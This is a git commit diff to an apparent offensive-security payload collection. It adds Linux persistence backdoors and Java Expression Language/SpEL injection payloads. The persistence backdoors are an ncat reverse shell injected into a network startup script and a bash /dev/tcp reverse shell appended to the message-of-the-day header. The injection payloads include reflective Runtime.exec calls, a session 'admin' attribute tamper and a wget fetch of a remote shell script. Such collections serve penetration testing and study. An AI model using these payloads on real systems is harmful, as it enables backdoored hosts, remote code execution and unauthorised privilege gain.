MOTD + SpEL injection

2024-05-13 15:46:05 +02:00 · 2023-02-20 17:21:43 +01:00 · 2023-02-20 17:21:43 +01:00 · a38701a7e2
parent d3ccbb5370
commit a38701a7e2
2 changed files with 44 additions and 8 deletions
--- a/Resources/Linux
+++ b/Resources/Linux
@ -5,10 +5,11 @@
 * [Basic reverse shell](#basic-reverse-shell)
 * [Add a root user](#add-a-root-user)
 * [Suid Binary](#suid-binary)
-* [Crontab - Reverse shell](#crontab-reverse-shell)
-* [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc)
-* [Backdooring a startup service](#backdoor-a-startup-service)
-* [Backdooring a user startup file](#backdooring-an-user-startup-file)
+* [Crontab - Reverse shell](#crontab---reverse-shell)
+* [Backdooring a user's bash_rc](#backdooring-a-users-bash_rc)
+* [Backdooring a startup service](#backdooring-a-startup-service)
+* [Backdooring a user startup file](#backdooring-a-user-startup-file)
+* [Backdooring Message of the Day](#backdooring-message-of-the-day)
 * [Backdooring a driver](#backdooring-a-driver)
 * [Backdooring the APT](#backdooring-the-apt)
 * [Backdooring the SSH](#backdooring-the-ssh)
@ -90,10 +91,20 @@ echo $sudopass >> /tmp/pass.txt

 ## Backdooring a startup service

-```bash
-RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
-sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
-```
+* Edit `/etc/network/if-up.d/upstart` file
+  ```bash
+  RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
+  sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
+  ```
+
+
+## Backdooring Message of the Day
+
+* Edit `/etc/update-motd.d/00-header` file
+  ```bash
+  echo 'bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"' >> /etc/update-motd.d/00-header
+  ```
+

 ## Backdooring a user startup file

--- a/Injection/README.md
+++ b/Injection/README.md
@ -145,8 +145,23 @@ ${{<%[%'"}}%\.
 ### Expression Language EL - Basic injection

 ```java
+${<property>}
 ${1+1}
+
+#{<expression string>}
 #{1+1}
+
+T(<javaclass>)
+```
+
+### Expression Language EL - Properties
+
+* Interesting properties to access `String`, `java.lang.Runtime`
+
+```ps1
+${2.class}
+${2.class.forName("java.lang.String")}
+${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
 ```

 ### Expression Language EL - One-Liner injections not including code execution
@ -157,6 +172,9 @@ ${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClas

 // JVM System Property Lookup (ex: java.class.path)
 ${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".getClass()).invoke("","java.class.path")}
+
+// Modify session attributes
+${pageContext.request.getSession().setAttribute("admin",true)}
 ```

 ### Expression Language EL - Code Execution
@ -181,10 +199,14 @@ ${request.getAttribute("a")}

 // Method using Reflection & Invoke
 ${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}
+${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('whoami')}

 // Method using ScriptEngineManager one-liner
 ${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))}

+// Method using JavaClass
+T(java.lang.Runtime).getRuntime().exec('whoami').x
+
 // Method using ScriptEngineManager
 ${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))}
 ```
@ -1132,3 +1154,6 @@ layout template:
 * [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
 * [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf)
 * [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw)
+* [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Dec 4, 2022](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
+* [Leveraging the Spring Expression Language (SpEL) injection vulnerability ( a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/)
+* [Expression Language Injection - OWASP](https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)